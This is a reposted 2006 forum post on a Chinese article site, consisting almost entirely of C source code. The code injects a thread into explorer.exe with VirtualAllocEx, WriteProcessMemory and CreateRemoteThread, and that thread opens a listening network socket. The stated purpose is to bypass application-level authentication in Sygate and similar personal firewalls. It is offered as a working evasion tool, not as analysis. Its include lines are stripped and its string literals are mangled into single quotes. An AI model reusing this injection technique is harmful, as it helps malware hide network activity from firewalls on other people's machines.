分享
 
 
 

bypass dll authentication in sygate and such

王朝c#·作者佚名  2006-12-16
窄屏简体版  字體: |||超大  

akcom

I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it

#define WIN32_LEAN_AND_MEAN

#include

#include

#include

#include

#include

typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );

typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );

typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );

typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );

typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );

typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );

typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );

typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );

typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );

typedef struct _INJINFO

{

char c_Lib[16];

char c_WSAStartup[12];

char c_Socket[8];

char c_Bind[8];

char c_Listen[8];

char c_Accept[8];

char c_CloseSocket[16];

char c_send[8];

char c_data[45];

LPLoadLibrary LoadLib;

LPGetProcAddress GetProcAddr;

} INJINFO, *PINJINFO;

static DWORD WINAPI ThreadProc( LPVOID lpParams )

{

PINJINFO info = (PINJINFO)lpParams;

HMODULE hLib = info->LoadLib( info->c_Lib );

LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );

LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );

LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );

LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );

LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );

LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );

LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );

SOCKADDR_IN sAddr;

sAddr.sin_addr.s_addr = INADDR_ANY;

sAddr.sin_port = 0xDEAD;

sAddr.sin_family = AF_INET;

WSADATA wsa;

wsastartup( 0x0202, &wsa );

SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );

wsalisten( ServerSocket, 5 );

SOCKET cli;

while (true)

{

cli = wsaaccept( ServerSocket, NULL, NULL );

if ( cli == SOCKET_ERROR )

break;

wsasend( cli, info->c_data, 45, 0 );

}

wsaclosesocket( ServerSocket );

return 0;

}

static void __declspec( naked ) end_proc()

{

}

INJINFO info =

{

'ws2_32.dll',

'WSAStartup',

'socket',

'bind',

'listen',

'accept',

'closesocket',

'send',

'slutted',

NULL,

NULL

};

int main(int argc, char* argv[])

{

HMODULE hLib = LoadLibrary( 'kernel32.dll' );

info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, 'LoadLibraryA' );

info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, 'GetProcAddress' );

DWORD dwPID;

GetWindowThreadProcessId( FindWindow( 'Shell_TrayWnd', NULL ), &dwPID );

printf( 'explorer pid: 0x%x\n', dwPID );

HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );

if ( hProcess == NULL )

{

printf( 'error opening process\n' );

return 0;

}

DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;

printf( 'proc size: %u\n', ProcSize );

LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );

if ( !lpProc || !lpParams )

{

printf( 'error allocating mem\n' );

return 0;

}

printf( 'memory allocated at 0x%X and 0x%X\n', lpProc, lpParams );

DWORD dwWritten;

WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );

WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );

printf( 'memory written\n' );

DWORD ThreadID;

HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );

if ( hThread == NULL )

{

printf( 'error creating thread\n' );

}

else

{

WaitForSingleObject( hThread, INFINITE );

}

VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );

VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );

printf( 'done\n' );

return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有